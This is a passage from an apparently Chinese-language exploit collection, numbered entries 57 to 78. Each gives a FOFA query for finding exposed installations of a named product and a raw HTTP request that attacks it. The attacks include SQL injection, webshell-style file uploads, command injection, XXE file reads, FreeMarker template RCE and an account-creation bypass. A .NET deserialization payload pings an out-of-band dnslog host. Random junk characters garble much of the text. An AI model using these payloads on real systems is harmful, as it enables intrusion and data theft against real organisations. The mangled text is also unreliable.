User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
. ^7 R/ ?: d% _+ u* c1 TContent-Type: application/json
$ S( J( L2 c: r' R& r9 `
) c$ U& O$ w5 a, b9 y: u! k) d6 y{: U4 A& ?/ r% G9 D3 h2 r: z* J1 L
"storeID":{
/ I) x+ } \0 K& q8 V "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",. W @' _+ ^8 V9 t- N% q# u
"MethodName":"Start",1 c( ]2 q& _7 Y
"ObjectInstance":{
+ i8 F& Q6 z0 j8 o2 Z0 [/ C8 D "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",9 }/ A8 {; j( v& `" n! I
"StartInfo": {. N l& F& p# j+ q
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
8 O }5 ~7 u% k "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"8 c1 f& a- E* H% P0 F) T! ^6 e$ S) ^0 N
}
3 y. p; k' A3 M3 @1 k6 e }6 ?+ F$ v% |7 y1 {
}% ?& f/ {6 ~ z2 O3 W/ G( b5 {1 ?* ~* t% p
}0 u0 \ u \9 Z" F$ Z n, V' }
+ D0 h8 X7 P, D% j* ~! Z- L+ {. b' r. ^( K4 P
57. 畅捷通T+ keyEdit.aspx SQL注入
A6 {) M7 e/ `& Y( RFOFA:app="畅捷通-TPlus"5 R. u: N B9 _8 x
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
+ P- s# y4 u# H7 Y8 aHost: host/ H* ]+ h4 p) M# y! J* Z7 H
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
6 z }7 D6 {3 ?# q. B# S6 [Accept-Charset: utf-84 j6 Y. ^2 i" R% w
Accept-Encoding: gzip, deflate7 X) X0 P9 V0 g, v, m' x
Connection: close
' J' X8 l5 W( X9 m1 ?4 t4 |3 Z$ m6 L3 n) [, N5 {
% l& ]' Y9 l6 ?' `: I
58. 畅捷通T+ KeyInfoList.aspx sql注入
; f- M$ f) D6 X9 t5 yFOFA:app="畅捷通-TPlus"
# Y2 z# l, Z% C$ t! F4 M! E9 L3 JGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1) y+ N# [& d$ b0 S1 o( {
Host: your-ip
1 _: i% ]8 r* d: N; J- `User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36) U, V& ~3 p* \
Accept-Charset: utf-8
; t, c# H0 l! {3 m2 AAccept-Encoding: gzip, deflate
' ?9 n8 ?0 z2 @! t" d8 C) ?3 @Connection: close: m+ g: Z p/ q! p& k( B
! Q3 h3 r5 Y- B6 \' E8 V3 m+ o" X; \2 d9 x
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
, t1 S7 q' c/ T$ {6 bFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
- J$ _3 ? v, c. A' v! L% CPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.19 Y3 `2 I# G5 ~2 q! @4 k# x1 E
Host: 192.168.86.128:9090
; S' i) m& Y6 O/ W) bUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36/ K) P' b; @& ?
Connection: close
/ F& }5 \! A' W2 J# J+ P P( K! xContent-Length: 1669
' k% J+ @! ^2 l6 Y3 L" p8 _Accept: */*1 ~7 U; K% E2 b% _+ H6 |
Accept-Language: en: ~5 p: O2 f1 p
Content-Type: application/x-www-form-urlencoded
- M S- h7 k( d* QAccept-Encoding: gzip
3 D3 c0 G" k4 H) `7 u7 r+ [3 F
, l2 Y2 W" r# j! ePAYLOAD; E8 t' O) {0 @( w+ m0 r3 M, R
* T. d/ ^6 d, H1 ^/ ~* z% y) L' w* ^2 v# d/ b
60. 百卓Smart管理平台 importexport.php SQL注入7 w8 R9 L1 G1 c6 m! g& d/ |& F
FOFA:title="Smart管理平台"
1 N7 h0 |, |' O- X K- ` SGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
+ n; H$ M- J+ s+ s/ L, B& fHost:1 k9 g5 e# |: b X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' x/ F+ m! d) I/ LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% F5 q% R3 d+ U: {Accept-Encoding: gzip, deflate
# q% z; m' E. @3 J7 hAccept-Language: zh-CN,zh;q=0.9, u6 f' A! }2 X% V
Connection: close
5 W5 r; a. f1 @2 C" d( W" j9 ^2 X8 H) ]+ L
. k1 D; G9 D' a9 I# P61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
3 @. b. @. M; j2 z& z Q5 _FOFA: title="欢迎使用浙大恩特客户资源管理系统"
* s+ `7 ?- `9 o7 f" a% |' kPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.15 Z g7 g- `2 o r' O6 S
Host: x.x.x.x7 c- K- V8 F! @5 p9 i. O- H! w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 g" g% F, E' E. _7 E
Connection: close d g3 o6 h4 S4 g
Content-Length: 27
9 `5 w. j- P- oAccept: */*; Z U* {* L# `9 N& ^8 m
Accept-Encoding: gzip, deflate |- }8 z7 C* h% W5 k# g1 n% j$ T2 p' h J
Accept-Language: en% a8 Q% Z, j& ~+ n' C, k! V! M
Content-Type: application/x-www-form-urlencoded1 ^5 ~5 K$ i s: j& M
, c) l* w2 ] e n5 I0 S7 h7 f8uxssX66eqrqtKObcVa0kid98xa
; ^! [- A$ e- [5 R- Q
3 \) e) o$ A6 A+ G% b9 v8 c: `
' d+ L6 L& m+ P! s2 d U62. IP-guard WebServer 远程命令执行
' z- V/ V0 |) N' F' C8 G2 o7 `FOFA:"IP-guard" && icon_hash="2030860561"- ?+ x2 P8 Y4 q+ Z* z' z( I# x
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
: `0 u( Q$ i5 }$ S# aHost: x.x.x.x
8 Z1 L+ ?& n4 nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.363 O) p+ |6 X: X7 g! t2 P" I
Connection: close( j# N) U- H+ I9 [& n1 ?
Accept: */*' n8 s$ U! E! P
Accept-Language: en
$ D8 \; b' g/ F9 ^1 RAccept-Encoding: gzip' T" j- b9 x2 E# l3 ]" V
?! q5 C# H$ o; v; _6 f
! r: P5 l4 t6 w$ I4 ^7 h: r* F8 }3 X
访问, I& ^2 ~0 d- F& r4 I0 e
. B% H( _9 _: d# r# o& v* |GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
) @4 G0 |9 R6 C8 N5 }' _Host: x.x.x.x
5 I& C! V# z! r; W, A9 P" o7 `. W
( F0 q! r- ~: v! o
. x' M. M* k% E" y63. IP-guard WebServer任意文件读取
4 a! }3 f, v& q% |$ X1 f# M, xIP-guard < 4.82.0609.0
9 m/ l3 z8 N" w3 |+ h5 r. g GFOFA:icon_hash="2030860561"
6 j" c1 a* C7 n$ k0 tPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
' S+ H7 v8 x1 G: \" G$ iHost: your-ip, S. n: d+ Q4 \5 k+ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
; g, a7 X8 q1 B% k4 L5 k1 h: PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- ?. H. I; s7 w5 J
Accept-Encoding: gzip, deflate# }( C! i' x1 E0 }; b! J
Accept-Language: zh-CN,zh;q=0.9
2 N4 m2 D7 U4 @Connection: close
' [- J4 G$ v0 f5 V- d" o. J, R5 U6 HContent-Type: application/x-www-form-urlencoded1 @" y; f4 E6 t1 T: m6 v
; U( m# a2 K% b$ Q! e% E( u
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A( Q+ R- o' f3 ], k, c
% k( I' Z3 | z# w! {
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
6 X$ B% ~1 B4 p5 d1 q6 MFOFA:body="/Scripts/EnjoyMsg.js"
) D1 t: V! p% p9 ~! GPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
3 Y7 e$ C; m" E1 U8 I* s; [: LHost: 192.168.86.128:90015 M( ?# n( T+ U- @1 [6 M0 `
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" q: ], N$ }7 d6 K" R; w& z
Connection: close
+ G" J; ^* a4 BContent-Length: 369
8 Y! n& v3 w9 ?( jAccept: */*2 E N6 g* z |0 E5 j
Accept-Language: en5 {5 w. {0 o: C! w% T
Content-Type: text/xml; charset=utf-80 b! f$ S: H" x4 \
Accept-Encoding: gzip0 F. k3 D# W0 {' ^# x) ]3 F4 H! c2 K
7 Y/ {2 m4 ?. E2 N1 H$ I' c<?xml version="1.0" encoding="utf-8"?>
( a3 Z) B0 T: n/ N<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
% Z; T% `0 F4 w2 y4 W8 y2 O<soap:Body>
8 c5 Q" I: J* z <GetOSpById xmlns="http://tempuri.org/">
# @# ^" }8 I( R+ M$ R <sId>1';waitfor delay '0:0:5'--+</sId>
/ `& _. N' Q7 ^& }; n3 Z </GetOSpById>) U' | a$ @$ k5 y& o
</soap:Body>
2 ?! f( Y4 B3 Z [: l& d</soap:Envelope>9 m W8 B6 {( B! D
" k/ t1 W$ r" U6 W. P0 p
* k, h9 Y0 [; q/ y$ o7 X' G65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过# [5 X3 t% y# z1 m/ ?
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"9 z- u. j! V: C7 s6 W: {
响应200即成功创建账号test123456/123456
/ N( E2 V7 L. P4 A0 k7 p4 yPOST /SystemMng.ashx HTTP/1.1
: j0 k3 u9 A" o4 k7 r8 y$ a0 eHost:
1 r+ B# @3 m2 f$ @5 C! vUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
2 ~, t, `4 V2 e1 M2 mAccept-Encoding: gzip, deflate
& T! U2 N5 ]) k3 ]0 ?Accept: */*
; q8 E) C+ F6 B( v2 uConnection: close
& N& J# _3 X) d5 p1 ~Accept-Language: en+ l% v8 g( f& z S& f5 [( D
Content-Length: 174
9 l: _( [3 X! ~; j
: s+ ~# h. q. x |operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
: g; R ~4 m7 e; }4 t* u3 h; Y( w2 {
( p; H: d0 ^; V. G. q# s
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
; }3 ^7 U1 H/ s1 ~FOFA:app="万户ezOFFICE协同管理平台"$ s7 y* M0 T3 S5 k3 \- Q8 z# p
9 @7 m) r$ T2 |5 n, o* }! XGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
0 Y* J+ Z. I& y5 D0 |9 X* mHost: x.x.x.x
: c& }- k @8 S! a( j' HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.368 Q! J0 L0 c6 x" d
Connection: close
. _" n9 q. ]7 A1 `& h" t9 _. PAccept: */*! }: h' |. c9 l6 O+ _ M0 U
Accept-Language: en
) k$ _( y/ Y' |: @" {3 Y' K) a: AAccept-Encoding: gzip; F6 M+ p/ B& y& F: v/ L
0 M, A2 Z) r) |8 ]$ V6 r: d
; M, D; Y# f1 V! P! X8 R) v第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
) p7 |0 d! U1 ?5 W5 {& A( q: E' Y
7 k+ L' ?) U1 @1 p' l67. 万户ezOFFICE wpsservlet任意文件上传- O# t( h7 S* T5 V/ o, u8 ^% `7 i
FOFA:app="万户网络-ezOFFICE"
3 E. S0 w9 ~- }" V0 h* y2 H5 N: KnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
/ E$ N# x5 n2 s0 QPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.12 {! R& z' o- j3 X# _6 r+ s. ~
Host: x.x.x.x9 L* o+ E$ T+ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
, J3 x! H& F, w5 RContent-Length: 173
$ f" @7 A" Z6 O- `- L+ GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8% ?1 S, T! y* Y7 I C, J! w
Accept-Encoding: gzip, deflate9 n. k9 ^ ?9 c3 q2 @
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
3 t) ~8 H7 ~* m9 c8 w. Q qConnection: close6 z2 \# z, w7 ~5 v7 {
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp! o' R; b% `+ W, F7 N
DNT: 1
2 G- r. Y6 U/ r. KUpgrade-Insecure-Requests: 1& j7 E+ T I" X" |: W" n1 t
6 a5 ~2 s6 G4 o3 P/ l
--ufuadpxathqvxfqnuyuqaozvseiueerp" S- ]4 Z# I; l( u9 J
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
" T. P/ _' l. A+ R. k
/ d, ?7 H1 d2 @' g<% out.print("sasdfghjkj");%> l$ r5 q3 A5 J2 P; q& N
--ufuadpxathqvxfqnuyuqaozvseiueerp--
* U0 J( O# J9 e; T& t: G% v
. U1 H) G( h: K# ?) {3 _ Q5 p9 `0 E4 b. g
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp8 Z. R7 |" o* O5 W& {$ C, m, J
5 @" |& i! t, k2 U# n: a8 D68. 万户ezOFFICE wf_printnum.jsp SQL注入
& p* D; K/ o* d5 ~/ vFOFA:app="万户ezOFFICE协同管理平台"2 I! w/ Q% p7 k/ f# T
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
# w2 u1 j5 l, U6 k$ e) y* |/ e1 QHost: {{host}}, b9 d o/ t$ A( z/ s9 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36% I6 i8 O i4 v
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8# r" A' O7 h$ M1 G
Accept-Encoding: gzip, deflate- E8 S% t" A; {/ l% v
Accept-Language: zh-CN,zh;q=0.9
1 ^2 E' R1 E, x8 R6 r* dConnection: close8 D4 q. {/ ` { f" R. O4 i& {
7 k) ^$ e. H+ G0 `, T% ^
0 S3 Q8 Y0 x' \$ h n& `' @; H
69. 万户 ezOFFICE contract_gd.jsp SQL注入: e) I2 L% l8 p, `9 U
FOFA:app="万户ezOFFICE协同管理平台"
7 ^& ~' K- Y# m* dGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1% g& v" d6 w5 _2 d9 Q# u) W q
Host: your-ip
$ C+ h5 v+ G; p4 w( D% a& T8 MUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.364 v Q% I, D; B+ P, @" N }/ C
Accept-Encoding: gzip, deflate
8 h+ u0 l' m% J: tAccept: */*8 p; e' i# C y; O$ }0 ?
Connection: keep-alive
' x0 a# b2 p5 X: P3 }- ~7 X) |3 ]5 {; ~' |! f
! l9 F3 d' N0 \70. 万户ezEIP success 命令执行4 Y! X2 f3 o8 L; Y& L
FOFA:app="万户网络-ezEIP"
/ e6 _' {+ K8 ~. APOST /member/success.aspx HTTP/1.1; S+ L% B0 \4 o I/ c* F8 P
Host: {{Hostname}}
. \) j( N& t9 o- GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
2 d& s' K, s! ?6 @, \" SSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
0 c' Q; f; }5 x7 nContent-Type: application/x-www-form-urlencoded: k$ f+ C1 r( t" R o( V. D5 W5 S* z% w
TYPE: C% M- G6 O8 Y E+ S1 M# X$ m
Content-Length: 16702
/ q* j0 k' R3 U4 P' a
% n/ p" M3 q3 v. b2 [0 Y__VIEWSTATE=PAYLOAD8 }7 i" c, K4 F- S2 G0 ?7 d
5 Q& t1 T8 ~3 p& @& J" J8 d/ e l3 ]8 _% J# B9 L- y/ t1 f
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
, ]. ~/ ?5 ?) Z! n# `, A) YFOFA:body="PM2项目管理系统BS版增强工具.zip"
. `3 b" H) @" lGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1: S5 J3 t/ b/ o3 }& d9 s) h8 J
Host: x.x.x.xx.x.x.x- f' I+ M h: t q& {4 Y
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.369 X/ Y* U* B% K/ l
Connection: close
& F3 o9 I: |% b" sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ L; t" [& a/ j5 o i
Accept-Encoding: gzip, deflate
1 _. f& c6 P( G+ P$ |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ Z% {0 O7 D- \- S( t' g
Upgrade-Insecure-Requests: 1
& c" t) h% V6 q! s- X0 D" M9 K2 b, [7 l, V
. i" g# s! C" Y* F7 A3 t* R4 C
72. 致远OA getAjaxDataServlet XXE8 C. |0 _0 w- E% X
FOFA:app="致远互联-OA"& c% T/ U4 P& j4 e2 B7 J" J
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
3 w3 n8 K2 Q9 ]& j8 \Host: 192.168.40.131:8099' K* q0 `/ C1 z/ ^+ }
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
/ H K7 b5 _( `9 aConnection: close
3 M% I9 {! d5 i+ p8 ` o4 t3 ?Content-Length: 5838 g* F6 A7 g. v; B7 R6 A
Content-Type: application/x-www-form-urlencoded
z+ S: l/ g5 P9 y8 kAccept-Encoding: gzip) D7 @' n0 |* s* d, C4 I3 J
1 ?5 v) f9 G: y, g4 US=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
: w9 H- i. d# I) j; m
8 _/ p, {, p9 u. s
0 v, m' ?7 i) ^& ]& `73. GeoServer wms远程代码执行1 t+ \3 j. X2 f' Q/ G8 J9 d
FOFA:icon_hash=”97540678”
$ a6 y' S: @( `) ~* x& g# SPOST /geoserver/wms HTTP/1.1
% X, g, k$ h3 z/ i8 FHost:
" a+ G+ y8 ~: zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
( \' W; ^! [& {" ^Content-Length: 1981
6 ]4 {$ L' S8 m s8 kAccept-Encoding: gzip, deflate
; ]/ t9 e* r8 Z8 q+ F) pConnection: close: _) ]) i- p' V3 u% t
Content-Type: application/xml: E; w7 l9 l, {- ~& _& ^
SL-CE-SUID: 3& Q! z8 \# T( Y% S, M$ |# V! h
, i I9 {7 W2 G. x- k XPAYLOAD
8 e+ q: f; W: A5 A
9 t# ~# g" |2 f+ z+ A, A. M
7 P; y: L7 ?( q# r) b7 F; Z, ^& L3 P) B74. 致远M3-server 6_1sp1 反序列化RCE
6 v3 H0 _# B: X* J3 N( e9 IFOFA:title="M3-Server"
9 E. ?6 q5 B- ~ pPAYLOAD" S3 B! q$ F) S7 v) k% j8 Y* u
# n+ j% S6 Y2 z4 D4 y75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE* Y. T/ e2 [+ b( J
FOFA:app="TELESQUARE-TLR-2005KSH"+ ~1 m' ~% Q5 P% n! f- ^
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1+ S% t, U3 G0 N
Host: x.x.x.x
3 ^$ [; P* |8 \; MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 r) h7 _* R* M+ w% g5 z5 Y: n% sConnection: close
) H3 l C, {8 ], L+ G6 O& aAccept: */*
: ]: r1 z; U: o9 u. q2 DAccept-Language: en
+ ]1 s3 r8 R1 ~8 ^* G( RAccept-Encoding: gzip6 r; s3 o9 } G: a& d! W8 o* q
% t0 I! P9 X- L/ g% u2 H* J+ Z( d9 O& q. {2 N% I; f( F
GET /cgi-bin/test28256.txt HTTP/1.1+ }8 ], J7 H* r/ ]
Host: x.x.x.x( v6 n9 @0 s5 B8 P9 f: P
9 S, |3 M+ y: C; z, {$ `
5 L8 Q( e1 N3 Y% C/ c3 I76. 新开普掌上校园服务管理平台service.action远程命令执行 ^" L' k' P) L! ]! m
FOFA:title="掌上校园服务管理平台"
/ \) @+ m( O9 ?, X* Y" F6 A' YPOST /service_transport/service.action HTTP/1.1* h; C9 e/ u5 N
Host: x.x.x.x! Z4 p7 h8 Y: y5 d3 M8 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.04 W8 d0 p! B+ J. E2 y
Connection: close1 s" ? m6 V4 u6 q8 {
Content-Length: 211
( D+ j4 ~% R; LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 m8 v* n z( n$ lAccept-Encoding: gzip, deflate$ Q! z( x2 ?" M4 q; F% G* L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- ~4 X) |* u% r/ jCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A49 V- W# t0 g! Q6 q" ^/ K3 h& ~
Upgrade-Insecure-Requests: 11 y3 h- H% Z8 ^6 h+ r
p' j* v) d7 }+ a4 g9 Y{" K6 c' G% r) U, o3 B
"command": "GetFZinfo",3 b6 G9 ?# ]7 U$ ^# P' s
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
% l" x" T/ i& j. N/ O6 Q8 x ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"! Z# |2 S7 j8 m6 _; y& r4 S v/ ^1 X
}7 L! O2 {' q0 e3 [& H
+ S1 y% [2 R! O; W1 p2 ]/ w
, I/ |* w4 [9 l# z, \GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.16 R/ q2 `) V+ b& B4 Z) C
Host: x.x.x.x
8 z X- p; I$ a$ U. u1 `: q! L
) h6 W! y+ w5 }" @" x D/ p/ n7 O \1 w
9 j- ~% _5 b0 z6 h( M1 E0 `
6 ?" M$ _- O+ M/ z. P1 B; m77. F22服装管理软件系统UploadHandler.ashx任意文件上传% r7 k, G1 ?- o- Y3 W( F
FOFA:body="F22WEB登陆"* w/ m( c% P: s& S, F1 s5 F) H
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
1 w! F3 ?6 s1 j7 q( l' Q& iHost: x.x.x.x* Z% p* b2 A' P ]7 ~' I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36: k! o8 J6 L0 M" K# }5 n! T; T
Connection: close0 { Y) |7 O# f+ O
Content-Length: 433
4 \: V) B$ @, Y2 L' C# wAccept: */*$ h1 H) |, V6 k5 l
Accept-Encoding: gzip, deflate0 g3 e5 M# C9 o1 \+ ^
Accept-Language: zh-CN,zh;q=0.9
/ R& {3 _8 u9 YContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix2 G3 j/ f& |# h, { @" E
2 X: M3 b' N9 }: Y
------------398jnjVTTlDVXHlE7yYnfwBoix
1 H1 {" _; a/ ^( |+ vContent-Disposition: form-data; name="folder"
; W9 { {% ^# W
7 A( {2 P0 \- c2 D/upload/udplog" o$ y4 m' C0 z7 O' H1 H1 H) |" E
------------398jnjVTTlDVXHlE7yYnfwBoix6 d7 b9 A% v8 n! M! a6 m
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
& a5 _; ~1 p, a) }" iContent-Type: application/octet-stream
! M! i$ Z+ ^3 F' r8 M, A. H' [1 M7 ?. X
hello1234567
' H2 v- F; d4 ?3 ~+ h------------398jnjVTTlDVXHlE7yYnfwBoix
5 j- ] B: \- {Content-Disposition: form-data; name="Upload", K; t; A% f- _& r4 m
! X, x% R- p7 U1 G* C3 Z2 tSubmit Query
* n. V% E& w! A------------398jnjVTTlDVXHlE7yYnfwBoix--6 b! _! D2 B" `, ?+ |! W
4 g7 Q+ h" I! z- W7 n. R' D, B7 u3 S* U! v& R3 n6 Y. n
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
6 O% e( c% m7 [8 i: MFOFA:icon_hash="2001627082"& |6 V8 V9 X2 H7 B# B* o
POST /Platform/System/FileUpload.ashx HTTP/1.1
# ^( T# u7 T& A' y) YHost: x.x.x.x" A' o9 B0 V7 p% u c/ c- i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: ?) o4 D( W9 V4 l. I- R
Connection: close L' j9 V! F. }7 ]. v
Content-Length: 336! o5 i7 ~5 ~ [* K. E7 j
Accept-Encoding: gzip$ M7 @( T& Y% X2 {
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l q/ o$ Y' C$ O5 C1 \
* x' ~8 Z4 x, m3 @8 k/ p6 t, T
------YsOxWxSvj1KyZow1PTsh98fdu6l) I& Q6 ^" ^6 j* E/ R& {
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
) c0 u% o: K: {1 KContent-Type: image/png
8 _ ^, U3 ^' L2 d2 O1 v; x& M
6 s% e# T5 m' g* ?4 gYsOxWxSvj1KyZow1PTsh98fdu6l
" g2 F2 ~. x& i4 R2 {------YsOxWxSvj1KyZow1PTsh98fdu6l: ]2 y) v0 e; p5 p
